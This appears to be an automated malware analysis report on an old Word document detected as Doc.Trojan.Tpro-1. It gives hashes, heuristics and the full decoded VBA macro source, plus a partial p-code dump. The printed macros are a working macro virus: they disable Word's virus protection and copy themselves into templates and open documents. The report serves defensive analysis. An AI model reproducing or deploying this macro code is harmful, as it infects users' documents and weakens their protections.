Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3367919c1ac67c9c…

MALICIOUS

Office (OLE)

Size: 38.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a8307c37d4266acf62e4a69643a439a1
SHA-1: b8ec239538c9ca25baf78e942a2e5faf67ee7fa8
SHA-256: 3367919c1ac67c9ccb4f68b74eeded4e5d2a836f7341edf7e468a3ccb0c9a14c
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is identified as malicious by ClamAV and contains critical AutoOpen and AutoClose VBA macros. The AutoClose macro explicitly disables virus protection (Application.Options.VirusProtection = False). The AutoOpen macro attempts to modify application templates, potentially to establish persistence or distribute further malware, by exporting the Module1 VBA module to C:\Program Files\Microsoft Office\Templates\Basic.bas and importing it into the loaded templates and open documents. The exact payload or ultimate goal is unclear because the extracted script is truncated, but the techniques indicate a downloader or dropper.

Heuristics (5)

  • ClamAV: Doc.Trojan.Tpro-1 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Tpro-1
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
  • Auto_Close macro [high, OLE_VBA_AUTOCLOSE]
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7402 bytes
SHA-256: d66e52110302777029a73ff72d7049dde03ee0ad36d73ef3431dd848e0151537

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoClose()
    Application.Options.VirusProtection = False
End Sub
Sub AutoOpen()
    On Error GoTo ErrorCL
    
    Const aLin As Long = 73

    Dim aTemp As Variant
    Dim aTName As String
    Dim aTPro As Variant
    Dim aPro As Variant
    Dim aName As String
    Dim aDoc As Variant
    Dim aCodeLin As Long
    Dim aTCodeLin As Long
    
    With Application.Options
        .VirusProtection = False
        .SaveInterval = 1
    End With
    
     'D--N
    For Each aTemp In Application.Templates
        With aTemp.VBProject
            aTName = .VBComponents(1).Name
            aTCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
            If aTCodeLin <> aLin Then
                For Each aTPro In .VBComponents
                    If aTPro.Name <> aTName Then
                        .VBComponents.Remove (aTPro)
                    End If
                Next aTPro
                ActiveDocument.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
                .VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
                aTemp.Save
                .VBComponents(1).Name = "ThisDocuments"
            End If
        End With
    Next aTemp
    
     'N--D
    For Each aDoc In Application.Documents
        With aDoc.VBProject
            aName = .VBComponents(1).Name
            aCodeLin = .VBComponents("Module1").CodeModule.CountOfLines
            If aCodeLin <> aLin Then
                For Each aPro In .VBComponents
                    If aPro.Name <> aName Then
                        .VBComponents.Remove (aPro)
                    End If
                Next aPro
                .VBComponents.Import ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
                Application.ActiveDocument.Save
            End If
        End With
    Next aDoc
    
    Exit Sub
    
ErrorCL:
    Select Case Err.Number
        Case 53   'There is Not Basic.bas
            Application.NormalTemplate.VBProject.VBComponents("Module1").Export ("C:\Program Files\Microsoft Office\Templates\Basic.bas")
            Resume
        Case -2147352565
            aCodeLin = 0
            Resume Next
    End Select
End Sub

' Processing file: /opt/analyzer/scan_staging/27ebbe4f46774e1594d8272c72704274.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1120 bytes
' Macros/VBA/Module1 - 3906 bytes
' Line #0:
' 	FuncDefn (Sub AutoClose())
' Line #1:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemLd Options 
' 	MemSt VirusProtection 
' Line #2:
' 	EndSub 
' Line #3:
' 	FuncDefn (Sub AutoOpen())
' Line #4:
' 	OnError ErrorCL 
' Line #5:
' Line #6:
' 	Dim (Const) 
' 	LitDI2 0x0049 
' 	VarDefn aLin (As Long)
' Line #7:
' Line #8:
' 	Dim 
' 	VarDefn aTemp (As Variant)
' Line #9:
' 	Dim 
' 	VarDefn aTName (As String)
' Line #10:
' 	Dim 
' 	VarDefn aTPro (As Variant)
' Line #11:
' 	Dim 
' 	VarDefn aPro (As Variant)
' Line #12:
' 	Dim 
' 	VarDefn aName (As String)
' Line #13:
' 	Dim 
' 	VarDefn aDoc (As Variant)
' Line #14:
' 	Dim 
' 	VarDefn aCodeLin (As Long)
' Line #15:
' 	Dim 
' 	VarDefn aTCodeLin (As Long)
' Line #16:
' Line #17:
' 	StartWithExpr 
' 	Ld Application 
' 	MemLd Options 
' 	With 
' Line #18:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #19:
' 	LitDI2 0x0001 
' 	MemStWith SaveInterval 
' Line #20:
' 	EndWith 
' Line #21:
' Line #22:
' 	QuoteRem 0x0005 0x0004 "D--N"
' Line #23:
' 	StartForVariable 
' 	Ld aTemp 
' 	EndForVariable 
' 	Ld Application 
' 	MemLd Templates 
' 	ForEach 
' Line #24:
' 	StartWithExpr 
' 	Ld aTemp 
' 	MemLd VBProject 
' 	With 
' Line #25:
' 	LitDI2 0x0001 
' 	ArgsMe
... (truncated)